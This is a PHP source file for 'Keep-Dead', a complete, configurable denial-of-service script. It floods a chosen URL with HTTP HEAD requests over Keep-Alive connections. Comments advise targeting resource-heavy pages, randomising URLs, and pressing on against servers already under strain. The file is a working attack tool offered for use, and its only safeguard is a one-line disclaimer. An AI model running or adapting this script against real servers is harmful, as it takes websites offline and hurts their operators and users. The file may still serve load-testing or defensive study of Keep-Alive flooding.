keep-dead.php

1. <?php
2.  
3. /*
4. Keep-Dead (Version 1.14)
5. http://www.esrun.co.uk/blog/keep-alive-dos-script/
6.  
7. A lightweight denial of service script that can be effective even when launched from low bandwidth connections.
8.  
9. Read and adjust the config options below as required. The default settings will work in most circumstances; allowing you
10. to simply update the target_url
11.  
12. Only use this script against your own home servers for security research.
13.  
14. This script is primarily meant for use via the terminal; although it will also work if launched via the browser.
15. */
16.  
17.  
18. #########
19. # Config
20. #########
21.  
22. /* target_url
23. The URL to be attacked. You should try and choose a resource intensive page such as a search
24. or live stat page. Use %rand% for a random value to be automatically generated for each individual request
25. */
26. $target_url = "http://127.0.0.1:8080 ";
27.  
28. /* max_requests
29. The maximum number of requests to be made. If you're running this via command line, you can leave the value
30. high and simply quit the script at any point . If you plan to run this via a web browser, I recommend setting this value to 5000
31. */
32. $max_requests = 100000000;
33.  
34. /* max_requests_per_connection
35. The maximum number of requests to be made per connection. Maximum value is 100
36. */
37. $max_requests_per_connection = 100;
38.  
39. /* delay_between_connections
40. The number of seconds to delay between opening a new connection. Recommended value: 0.5
41. */
42. $delay_between_connections = 0;
43.  
44. /* delay_between_requests
45. The number of seconds to delay between outgoing requests. Recommended value: 0.01
46. */
47. $delay_between_requests = 0;
48.  
49. /* skip_check
50. If the server you're attacking is already under strain and only sporadically accepting
51. connections, you'll want to skip the Keep-Alive support check (change the value to 1)
52. */
53. $skip_check = 0;
54.  
55. /* useragent
56. Useragent to send with requests
57. */
58. $useragent = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7";
59.  
60.  
61. ##############################
62. # Do not edit below this line
63. ##############################
64.  
65. //Check if Keep-Dead is being launched from a command prompt or browser
66. if($_SERVER['SERVER_PROTOCOL']){
67. $output_to_browser = 1;
68. } else {
69. $output_to_browser = 0;
70. }
71.  
72. if($output_to_browser == 1){
73. set_time_limit(300); //Limit script to run no longer than 300 seconds if launched via the web browser
74. $lb = "<br>\n"; //Line break
75.  
76. //Header
77. echo "<pre>
78. _ __ ____ _
79. | |/ /___ ___ _ __ | _ \ ___ __ _ __| |
80. | ' // _ \/ _ \ '_ \ _____| | | |/ _ \/ _` |/ _` |
81. | . \ __/ __/ |_) |_____| |_| | __/ (_| | (_| |
82. |_|\_\___|\___| .__/ |____/ \___|\__,_|\__,_|
83. |_| </pre>";
84. echo "Keep-Dead (www.esrun.co.uk)".$lb.$lb;
85. } else {
86. set_time_limit(0); //No time limit when launched from command line
87. $lb = "\n"; //Line break
88.  
89. //Header
90. echo " _ __ ____ _ ".$lb;
91. echo "| |/ /___ ___ _ __ | _ \ ___ __ _ __| |".$lb;
92. echo "| ' // _ \/ _ \ '_ \ _____| | | |/ _ \/ _` |/ _` |".$lb;
93. echo "| . \ __/ __/ |_) |_____| |_| | __/ (_| | (_| |".$lb;
94. echo "|_|\_\___|\___| .__/ |____/ \___|\__,_|\__,_|".$lb;
95. echo " |_| ".$lb;
96. echo "Keep-Dead (www.esrun.co.uk)".$lb.$lb;
97. }
98.  
99.  
100. ########################################################
101. # Function used for adding random string to request urls
102. ########################################################
103. function quick_rand(){
104. $letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
105. $rand_string = '';
106. for($i=0;$i<rand(4,12);$i++){
107. $rand_string.=$letters[array_rand($letters)];
108. }
109. return($rand_string);
110. }
111.  
112. ########################################################
113. # Parse the target URL to get the host, path and query
114. ########################################################
115. $target_url_parsed = parse_url($target_url);
116.  
117. $target_url = array();
118. $target_url['host'] = $target_url_parsed['host'];
119. @$target_url['path'] = $target_url_parsed['path'];
120. @$target_url['query'] = $target_url_parsed['query'];
121. @$target_url['port'] = $target_url_parsed['port'];
122.  
123. if(!$target_url['path']){
124. $target_url['path'] = '/';
125. }
126.  
127. if(!$target_url['port']){
128. $target_url['port'] = 80;
129. }
130.  
131. if($target_url['query']){
132. $request_url = $target_url['path']."?".$target_url['query'];
133. } else {
134. $request_url = $target_url['path'];
135. }
136.  
137.  
138. ################################################
139. # Check if the remote host supports Keep-Alive
140. ################################################
141. if($skip_check != 1){
142. //Send request with Keep-Alive header
143. $reply = '';
144. $socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
145. if(!$socket){
146. die("Failed to open a connection to ".$target_url['host']." on port ".$target_url['port'].$lb);
147. }
148. $request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
149. fwrite($socket, $request);
150. $incoming_data = '';
151. while (!feof($socket)){
152. $buffer=fgets($socket, 128);
153. $reply.=$buffer;
154.  
155. //Watch for end of reply and close socket/break out of loop
156. if($buffer == "\r\n"){
157. @fclose($socket); break;
158. }
159. }
160.  
161.  
162. //Check if the reply to our above request includes 'Connection: close'. If so, the remote host doesn't support Keep-Alive
163. if(strpos($reply, "Connection: close")){
164. echo $target_url['host']." does not support Keep-Alive! max_requests_per_connection will be set to 1, making this a much slower attack.\n\n";
165. $max_requests_per_connection = 1;
166. }
167. }
168.  
169. ################
170. # Send requests
171. ################
172.  
173. //Most servers limit Keep-Alive sessions to 100 requests per connection
174. if($max_requests_per_connection > 100){ $max_requests_per_connection = 100; }
175. if($max_requests_per_connection < 1){ $max_requests_per_connection = 1; }
176.  
177. //Work out how many connections to make in order to fulfill the max_requests
178. $max_connections = ceil($max_requests / $max_requests_per_connection);
179.  
180.  
181. for($c=0;$c<$max_connections;$c++){ //Stay within our max_connections limit
182. echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
183. @$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
184. if(!$attack_socket){
185. echo "failed (".$errstr.")".$lb;
186. } else {
187. echo "success".$lb."Sending requests: |";
188. for($r=0;$r<$max_requests_per_connection;$r++){ //Stay within our max_requests_per_connection limit
189. $request = "HEAD ".str_replace("%rand%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
190. @fwrite($attack_socket, $request);
191. echo ".";
192. usleep($delay_between_requests * 1000000); //Delay between requests
193. }
194. echo "|".$lb;
195. }
196. @fclose($attack_socket);
197. echo "Closed connection".$lb;
198.  
199. usleep($delay_between_connections * 1000000);
200. }
201.  
202. ?>